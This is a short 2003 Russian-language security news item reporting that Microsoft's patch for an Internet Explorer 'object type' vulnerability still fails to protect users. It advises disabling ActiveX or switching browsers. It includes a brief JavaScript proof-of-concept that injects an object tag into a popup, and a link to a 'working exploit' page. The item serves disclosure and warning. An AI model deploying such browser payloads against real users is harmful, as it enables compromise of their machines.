Заплатка для Internet Explorer все еще не работает (эксплоит)

Выпущенный еще 20 августа патч, который должен был закрыть вопрос уязвимости MS IE при обработке запросов вида “object type”, по-прежнему отказывается защищать компьютеры.

Даже несмотря на то, что 28 августа 2003 года Microsoft выложила на своем сервере обновленный вариант заплатки, установившие ее пользователи по-прежнему остаются под угрозой.

До тех пор, пока программисты Microsoft не справятся со своей задачей, пользователям рекомендовано отключить на своих браузерах поддержку технологии ActiveX или поменять браузер.

Пример:

  <script>
    var oPopup = window.createPopup();
  
    function showPopup() {
      oPopup.document.body.innerHTML = "<object data=ouch.php>";
      oPopup.show(0,0,1,1,document.body);
    }
    
    showPopup()
  </script>
  

Пример рабочего эксплоита: http://www.malware.com/badnews.html